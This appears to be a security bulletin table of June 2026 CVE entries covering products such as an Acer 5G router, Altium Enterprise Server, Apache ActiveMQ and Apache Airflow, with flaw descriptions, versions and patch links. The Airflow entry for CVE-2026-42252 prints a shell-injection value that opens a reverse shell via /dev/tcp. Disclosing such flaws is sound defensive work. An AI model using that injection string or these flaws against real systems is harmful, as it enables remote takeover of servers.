| westboy--CicadasCMS | A weakness has been identified in westboy CicadasCMS up to 2431154dac8d0735e04f1fd2a3c3556668fc8dab. Impacted is an unknown function of the file src/main/java/com/zhiliao/module/web/system/ScheduleJobController.java of the component Task Scheduling Management Module. Executing a manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 2.4 | CVE-2026-10529 |
| wpvividplugins--WPvivid Backup, Migration & Staging | The Migration, Backup, Staging - WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory deletion due to insufficient file path validation in the delete_cancel_staging_site() function in all versions up to, and including, 0.9.128. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary folders on the server, which leads to a loss of data. | 2026-06-05 | 3.8 | CVE-2025-12656 |
| zilliztech--GPTCache | A vulnerability was detected in zilliztech GPTCache up to 0.1.44. Affected by this issue is the function BufferedReader.peek of the file gptcache/processor/pre.py of the component Cache Key Handler. Performing a manipulation of the argument input_data["image"] results in use of weak hash. The attack must be initiated from a local position. The attack is considered to have high complexity. The exploitation is known to be difficult. The exploit is now public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10812 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Acer--Connect M6E 5G Portable WiFi Router | The FieldX MDM adb messaging topic passes unverified payloads directly into Runtime.exec(), allowing command/instruction injection. | 2026-06-04 | not yet calculated | CVE-2026-49185 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The local MQTT broker does not enforce topic-level Access Control Lists (ACLs). This allows any client to subscribe using wildcard characters (# or +) to enumerate hidden network devices or publish rogue control commands. | 2026-06-04 | not yet calculated | CVE-2026-49186 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The hard-coded APK resource files never expire, and the shared scepter leads to information leaks and potential misuse. | 2026-06-04 | not yet calculated | CVE-2026-49187 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The ai_cmd utility executes with full root permissions. It pipes socket inputs directly to popen(), paving the way for unauthenticated users to execute arbitrary root commands. | 2026-06-04 | not yet calculated | CVE-2026-49188 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Unchecked public access permissions on a core Broadcast Receiver allow unauthorized local software components to invoke administrative operations. | 2026-06-04 | not yet calculated | CVE-2026-49189 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The system fails to evaluate instructional permissions over multiple internal operation codes (opcodes), permitting unauthorized application installations or command executions. | 2026-06-04 | not yet calculated | CVE-2026-49190 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The production build of the M3WebServer hard-codes its backend API keys, which can be easily intercepted through verbose error handling pages. | 2026-06-04 | not yet calculated | CVE-2026-49191 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The summary service endpoint suffers from an IDOR vulnerability where it fails to verify user ownership of hardware serial numbers, exposing device data to scraping. | 2026-06-04 | not yet calculated | CVE-2026-49192 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Overly permissive configuration settings on cloud storage containers expose active telemetry information publicly to the internet. | 2026-06-04 | not yet calculated | CVE-2026-49193 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The debugging routine SCREEN_CLICK(5053) enables a connection to skip the standard device login prompt entirely and directly enter an interactive shell interface. | 2026-06-04 | not yet calculated | CVE-2026-49194 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Internal multimedia session archives are accessible without authentication, exacerbated by loose Cross-Origin Resource Sharing (CORS) rules that allow cross-site theft. | 2026-06-04 | not yet calculated | CVE-2026-49202 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Crucial management API endpoints for cellular eSIM allocation do not validate caller authorization, allowing remote profiles to be rewritten or deleted. | 2026-06-04 | not yet calculated | CVE-2026-49203 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Leftover debug modules contain fixed credentials for internal AWS Cognito test sandboxes, risking asset exploitation. | 2026-06-04 | not yet calculated | CVE-2026-49204 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | System log files output unencrypted SMTP server authentication passwords alongside sensitive employee corporate identification data. | 2026-06-04 | not yet calculated | CVE-2026-50205 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Incoming VPN network profile settings fail to process special characters safely, enabling command injection via malicious config files. | 2026-06-04 | not yet calculated | CVE-2026-50206 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The system Binder boundary accepts unverified pass-through AT commands, giving local applications the power to read baseband files or disable cellular connectivity. | 2026-06-04 | not yet calculated | CVE-2026-50207 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | High-risk TrustAllCerts routines disable standard TLS certificate validation. Combined with hard-coded DES symmetric encryption keys, a Man-in-the-Middle (MITM) actor could decrypt network traffic. | 2026-06-04 | not yet calculated | CVE-2026-50208 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Broadcast events allow malicious software to rewrite the device's default Mobile Device Management (MDM) endpoint address, shifting administrative ownership to an external attacker. | 2026-06-04 | not yet calculated | CVE-2026-50209 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The device encrypts data using AES-CBC with static zero-filled Initialization Vectors (IVs), making it susceptible to replay attacks and known-plaintext decryption. | 2026-06-04 | not yet calculated | CVE-2026-50210 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Leftover engineering diagnostics and factory-level diagnostic software remain exposed on retail builds, giving malicious apps write privileges to internal NVRAM registers. | 2026-06-04 | not yet calculated | CVE-2026-50211 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Weak validation logic within device dissociation API routines allows a remote entity to forcefully unbind unrelated user endpoints, causing severe denial of service. | 2026-06-04 | not yet calculated | CVE-2026-50212 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The account validation endpoint /v1/User/validate returns comprehensive user profile data sheets, which can be crawled by iterating predictable identification strings. | 2026-06-04 | not yet calculated | CVE-2026-50213 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The /v1/Plan service relies entirely on a shared global API token for full administrative management, allowing arbitrary creation of zero-cost network access plans. | 2026-06-04 | not yet calculated | CVE-2026-50214 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The web administration panel binds broadly to the public IPv6 address space on port [::]:8080 without default firewall limits, making internal API endpoints reachable over the WAN. | 2026-06-04 | not yet calculated | CVE-2026-50224 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The registration path /v1/account/register provides no bot mitigation mechanisms, allowing malicious automated systems to flood the database. | 2026-06-04 | not yet calculated | CVE-2026-50225 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Fixed AES-128-CBC keys inside the AcerConnect OTA application let attackers forge authorization credentials for arbitrary IMEI numbers. This allows unauthorized actors to list catalog items and extract protected binaries from pre-signed cloud links. | 2026-06-04 | not yet calculated | CVE-2026-50226 | https://community.acer.com/en/kb/articles/19707 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to excessive permissions assigned to child processes. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-42061 | SEC-3083 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to EXE hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-44609 | SEC-3084 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-44682 | SEC-11249 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-50033 | SEC-3085 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.14.0, cookies set with the `cookies` parameter on requests are sent after following a cross-origin redirect. If a developer uses the `cookies` parameter on a per-request basis then sensitive data might be leaked to an attacker if they manage to control a redirect. Version 3.14.0 patches the issue. If unable to upgrade, using a `Cookie` header in the `headers` parameter is not vulnerable. | 2026-06-02 | not yet calculated | CVE-2026-47265 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hg6j-4rv6-33pg https://github.com/aio-libs/aiohttp/commit/f54c40851b0d6c4bbdab97ba518a223adda32478 |
| Aiven-Open--klaw | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, improper access control allows disclosure of password hash. This issue has been patched in version 2.10.4. | 2026-06-02 | not yet calculated | CVE-2026-45080 | https://github.com/Aiven-Open/klaw/security/advisories/GHSA-v7m7-fr8v-hpx2 https://github.com/Aiven-Open/klaw/releases/tag/v2.10.4 |
| Altium--Altium Enterprise Server | A hard-coded cryptographic key is used by Altium Enterprise Server to sign file download URLs in the Vault service. Because the key is identical across all installations, an unauthenticated network attacker who can reach the server can forge valid download signatures and retrieve files from the Vault storage area without any authentication, session, or credentials. A separate path traversal vulnerability in the same download endpoint allows the configured storage root to be escaped, enabling reads of arbitrary files on the server filesystem. Combined, these issues allow an unauthenticated attacker to obtain sensitive server configuration and key material, which can lead to full server compromise. The vulnerability can be chained with CVE-2026-9152 to enumerate and bulk-download stored content. Altium 365 cloud deployments are not impacted in practice, as file storage uses object storage rather than the local filesystem. | 2026-06-05 | not yet calculated | CVE-2026-11414 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Vault Service UploadController due to improper validation of a user-controlled path component in image upload requests. An authenticated user can supply a crafted absolute path so that the configured storage root is discarded, allowing arbitrary files to be written to any location on the server filesystem writable by the service account. Because content-controlled files can be written to web-accessible directories, or used to overwrite application binaries or configuration files, this can be escalated to remote code execution, service takeover, or denial of service. Altium 365 cloud deployments are not affected, as the affected endpoint is not reachable and the cloud storage architecture mitigates the file-write primitive. | 2026-06-05 | not yet calculated | CVE-2026-11419 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | Two path traversal vulnerabilities in the Network Installation Service (NIS) of Altium Enterprise Server allow an unauthenticated network attacker to write arbitrary files to any writable location on the server filesystem and to read package archive files from the server. No authentication, session, or credentials are required. Because content-controlled files can be written to web-accessible directories, or used to overwrite application binaries or configuration files, exploitation can be escalated to remote code execution in the context of the service account, and can disclose deployment package contents. Altium 365 cloud deployments are not affected, as the Network Installation Service is not part of the cloud offering. | 2026-06-05 | not yet calculated | CVE-2026-11420 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Collaboration Service due to improper handling of user-supplied filenames in the MCAD and Simulation file download flows. A regular authenticated user can submit a collaboration message containing a crafted filename, which is later used to construct the download path on the server without validation, allowing arbitrary files to be read from the server filesystem. Because the readable files include the server's master configuration, which stores credentials for privileged accounts, exploitation can lead to authenticating as a system administrator and gaining full control of the server. Altium 365 cloud deployments are not affected. | 2026-06-05 | not yet calculated | CVE-2026-11423 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A server-side request forgery (SSRF) vulnerability exists in a GraphQL service component shared by Altium Enterprise Server and Altium 365. An authenticated user can submit a request whose input is treated as a URL by the server and used to issue an outbound HTTP GET request without URL validation or destination filtering. The response body is then returned to the user. This allows an authenticated attacker to reach internal services and metadata endpoints that would not otherwise be accessible from the public network, and to retrieve their contents. The impact is information disclosure and internal infrastructure reconnaissance; the request primitive is limited to HTTP GET with no custom headers. Altium Enterprise Server is fixed in 8.1.1; the issue has been remediated in Altium 365 at the service level. | 2026-06-05 | not yet calculated | CVE-2026-11424 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Git Service component shared by Altium Enterprise Server and Altium 365. The service accepts a sequence of post-clone file-manipulation operations that use user-supplied paths without validation, allowing an authenticated user with basic git access to move arbitrary files outside the intended repository area. This file-move primitive can be used to place attacker-controlled script content into directories where it is later executed by the service, resulting in remote code execution under the Git Service account. On multi-tenant Altium 365 deployments, this could have allowed access to data belonging to other tenants on the same infrastructure node. Altium Enterprise Server is fixed in 8.1.1; the issue has been remediated in Altium 365 at the service level. | 2026-06-05 | not yet calculated | CVE-2026-11429 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Projects Service download endpoint shared by Altium Enterprise Server and Altium 365. An authenticated user can supply a crafted path parameter that bypasses validation, allowing arbitrary files (including entire directories returned as archives) to be read from the server filesystem. Because the readable files include service configuration and credential material, exploitation can be used to gather information enabling further compromise. The issue can be combined with CVE-2026-11424 to reach the cloud-side endpoint. On multi-tenant Altium 365 deployments, the readable configuration could have exposed credentials shared across services. Altium Enterprise Server is fixed in 8.1.1; the issue has been remediated in Altium 365 at the service level. | 2026-06-05 | not yet calculated | CVE-2026-11431 | https://www.altium.com/platform/security-compliance/security-advisories |
| AMD--AMD Athlon 3000 Series Mobile Processors with Radeon Graphics | Insufficient granularity of access control in ASP (AMD Secure Processor) may allow an attacker with an untrusted user space application to map sensitive SMN (System Management Network) apertures leading to a potential escalation of privileges. | 2026-06-01 | not yet calculated | CVE-2021-46747 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| Apache Software Foundation--Apache ActiveMQ | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. The MessageServlet in the ActiveMQ web console API copies every JMS message property into an HTTP response header without any validation. This can allow overwriting and injecting security headers by setting them on JMS messages that are returned by the servlet. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ Web: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. The MessageServlet has now been deprecated and disabled by default. | 2026-06-01 | not yet calculated | CVE-2026-42253 | https://lists.apache.org/thread/j9vmlc410ht5f28fc98gx75jcbq62j00 |
| Apache Software Foundation--Apache ActiveMQ | Incorrect Default Permissions vulnerability in Apache ActiveMQ. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. The default Jolokia authorization settings granted non-admin (low-privilege) web-login accounts access to Jolokia operations which allowed executing broker management operations meant for admins such as addQueue and removeQueue. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-49157 | https://lists.apache.org/thread/rrcsf6s90hj4tdh89nvkko75q5505rj8 |
| Apache Software Foundation--Apache ActiveMQ Broker | Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter using the "masterslave:// " URL which can allow loading a Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-42588 | https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm |
| Apache Software Foundation--Apache ActiveMQ Broker | Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Non-parenthesized discovery wrappers such as `masterslave:vm://...,...` and `static:vm://...` incorrectly pass validation allowing bypass of fix in CVE-2026-34197. Original description from CVE-2026-34197. Apache ActiveMQ exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery UR that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-45505 | https://nvd.nist.gov/vuln/detail/CVE-2026-34197 https://lists.apache.org/thread/7n97nddyw96w6ykldjv1h40jx86xdo0w |
| Apache Software Foundation--Apache ActiveMQ Broker | Incomplete authorization by Apache ActiveMQ server before versions v6.2.6 and v5.19.7 allows authenticated connections to remove existing destinations with proper permissions. This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version v6.2.6 or v5.19.7, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-46605 | https://lists.apache.org/thread/l4lxgr2s73g9pb218f180psfyskf8ldm |
| Apache Software Foundation--Apache ActiveMQ Broker | Exposure of Sensitive Information Through Metadata vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ, Apache ActiveMQ All. Brokers that are configured with a network connector with syncDurableSubs set to true, are vulnerable to an unauthenticated attacker who can receive a list of all durable topic subscriptions in the broker, including client identifiers, subscription names, topic destinations, and JMS selector expressions, by sending a BrokerInfo command. The broker incorrectly responds without first ensuring the connection is authenticated. This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-49270 | https://lists.apache.org/thread/k3233c1x506z3w7x4z0dqvd86d4v2fr2 |
| Apache Software Foundation--Apache Airflow | A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack - e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem. | 2026-06-01 | not yet calculated | CVE-2026-40861 | https://github.com/apache/airflow/pull/65325 https://lists.apache.org/thread/823334db2559xjlwt59gpzjz47thnscl |
| Apache Software Foundation--Apache Airflow | A bug in the login redirect route in Apache Airflow allowed authenticated users to craft URLs that bypassed the `is_safe_url` check, enabling redirection from a trusted Airflow domain to an attacker-controlled origin. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can place Airflow behind a reverse proxy that strips off-domain `next=` query parameters before they reach the login endpoint. | 2026-06-01 | not yet calculated | CVE-2026-40961 | https://github.com/apache/airflow/pull/65557 https://lists.apache.org/thread/qmt8ksh7gty6b8hr9w294t94j36jdv1q |
| Apache Software Foundation--Apache Airflow | The structure_data endpoint in the Airflow UI returned external dependency graph nodes for linked Dags without checking whether the caller had read permission on those linked Dags. An authenticated UI/API user authorized for one Dag could enumerate linked Dag IDs and dependency metadata for other Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping to keep Dag dependency topology private across teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-40963 | https://github.com/apache/airflow/pull/65342 https://lists.apache.org/thread/s907bhsksc37m59f0loqjcp1ryobrr60 |
| Apache Software Foundation--Apache Airflow | The partitioned_dag_runs endpoints in the Airflow UI enforced only asset-level access control, not per-Dag authorization. An authenticated UI/API user with global Asset:read permission could enumerate partition run state, schedule configuration, and asset wiring for Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping while granting users broader Asset access. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-41014 | https://github.com/apache/airflow/pull/65344 https://lists.apache.org/thread/12nbzwwby7g883w2j13gn7ny1545xob9 |
| Apache Software Foundation--Apache Airflow | Apache Airflow's `JWTRefreshMiddleware` set the JWT auth cookie without the `Secure` flag, so deployments running the Airflow API server behind an HTTPS-terminating reverse proxy (e.g. nginx / Envoy / a managed load balancer that terminates TLS and forwards plaintext to the API server, the default cloud-native topology) would have the user's session JWT replayed over any cleartext HTTP request to the same host. A network-positioned attacker (Wi-Fi MITM, hostile LAN, captive-portal proxy) could induce a logged-in user's browser to issue an HTTP request to the deployment's hostname and capture the JWT cookie out of that request, then replay it against the authenticated API. Affects deployments where the Airflow API server is reached through a TLS-terminating proxy and the cookie's secure-by-default protection is load-bearing for session integrity. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-41017 | https://github.com/apache/airflow/pull/65348 https://lists.apache.org/thread/9jx0sk49c1250zflx0q3clc717qgjdch |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's bulk Task Instances API (`PATCH/DELETE /api/v2/dags/{dag_id}/dagRuns/{dag_run_id}/taskInstances`) evaluated authorization against the `dag_id` resolved from the URL path while operating on the `dag_id` / `dag_run_id` extracted from request-body entity fields. An authenticated UI/API user with edit permission on one Dag could mutate Task Instance state in any other Dag by keeping the authorized Dag's ID in the URL path and naming the target Dag's IDs in the request body entities. Affects deployments that rely on per-Dag edit-scope to keep Task Instance state isolated between teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-41084 | https://github.com/apache/airflow/pull/64288 https://lists.apache.org/thread/w0hdcqfr71hf9rl1bwvpjs7q9yp1bldk |
| Apache Software Foundation--Apache Airflow | Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 - the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release. | 2026-06-01 | not yet calculated | CVE-2026-42252 | https://github.com/apache/airflow/pull/64129 https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7 |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's Variable response masker caused nested-key redaction (triggered by secret-suffixed key names like `password`, `token`, `secret`, `api_key`) to be bypassed when the JSON value's nesting depth exceeded the shared secrets masker's recursion limit: the masker returned the original nested item before checking the sensitive key name. An authenticated UI/API user with Variable read permission could harvest plaintext secret values stored under sensitive keys nested deep enough to exceed the masker's depth cap. Affects deployments that store sensitive values inside deeply-nested JSON Variables. This is a residual gap in the fix for CVE-2026-32690 (which covered shallower nesting via `max_depth=1`); the depth-limit boundary itself was not raised, so the same key-name bypass pattern reappears beyond the recursion cap. Users who already upgraded for CVE-2026-32690 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the deep-nesting path. | 2026-06-01 | not yet calculated | CVE-2026-42358 | https://github.com/apache/airflow/pull/65912 https://lists.apache.org/thread/33635mv3zjb75wn5453c5yf9trs8x2om |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's XCom PATCH endpoint `PATCH /api/v2/xcomEntries/{key}` allowed an authenticated UI/API user with XCom write permission on a Dag to set XCom entries under reserved key names (e.g. `return_value`) that the matching POST endpoint already validated against `FORBIDDEN_XCOM_KEYS`. The endpoint also accepted serialized payload shapes the triggerer's deserializer treats as code; combined, this allowed RCE on the triggerer when the affected task next deferred. Affects deployments where untrusted users have XCom write permission on Dags that defer to the triggerer. This is a fix-bypass of CVE-2026-33858: PR #64148 added the `FORBIDDEN_XCOM_KEYS` validator only on the POST/set path; the PATCH path was not covered. Users who already upgraded for CVE-2026-33858 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the PATCH-path bypass. | 2026-06-01 | not yet calculated | CVE-2026-42359 | https://github.com/apache/airflow/pull/65915 https://lists.apache.org/thread/g8dqykpf1p90tysq8tln4qtkqwb1038s https://www.cve.org/CVERecord?id=CVE-2026-33858 |
| Apache Software Foundation--Apache Airflow | A bug in Apache Airflow's rendered-template field handling caused nested sensitive-key masking (e.g. nested `password` / `token` / `secret` / `api_key` keys inside a JSON template structure) to be bypassed when the rendered field exceeded `[core] max_templated_field_length`: Airflow stringified the structure before redaction, losing the nested key context, and persisted the plaintext value into `rendered_fields`. An authenticated UI/API user with permission to read rendered template fields could harvest secret values intended to be masked. Affects deployments where Dag authors pass structured JSON to operators with nested sensitive keys. This is a variant of `CWE-200` previously addressed for the user-registered `mask_secret()` patterns in CVE-2025-68438; that fix did not cover the nested sensitive-keyword allowlist. Users who already upgraded for CVE-2025-68438 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the nested-key path. | 2026-06-01 | not yet calculated | CVE-2026-42360 | https://github.com/apache/airflow/pull/65906 https://lists.apache.org/thread/obj79bpxnl7r5olz1gsn0g94y88glnl4 |
| Apache Software Foundation--Apache Airflow | A bug in the GET `/api/v2/connections/{connection_id}` REST API endpoint in Apache Airflow allowed an authenticated UI/API user with Connection-read permission to retrieve secrets stored in a Connection's `extra` JSON blob under field names not present in the redaction allowlist (`DEFAULT_SENSITIVE_FIELDS`) - for example, official Slack-provider credential field names were returned in plaintext. Affects deployments that store credentials in Connection `extra` blobs and grant Connection-read access to multiple users. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can store sensitive credential values in a secret-backend rather than inlined into the Connection's `extra` field. | 2026-06-01 | not yet calculated | CVE-2026-45192 | https://github.com/apache/airflow/pull/66673 https://lists.apache.org/thread/r2q93dg2wp5h9sd9vh6y4y5ljqd9crdd |
| Apache Software Foundation--Apache Airflow | Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler - the default on single-host deployments where the DAG bundle is importable from the scheduler process - could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. | 2026-06-01 | not yet calculated | CVE-2026-45360 | https://github.com/apache/airflow/pull/66737 https://lists.apache.org/thread/q227dghjwgfz8xsxrf2pwpz4wk43zm83 |
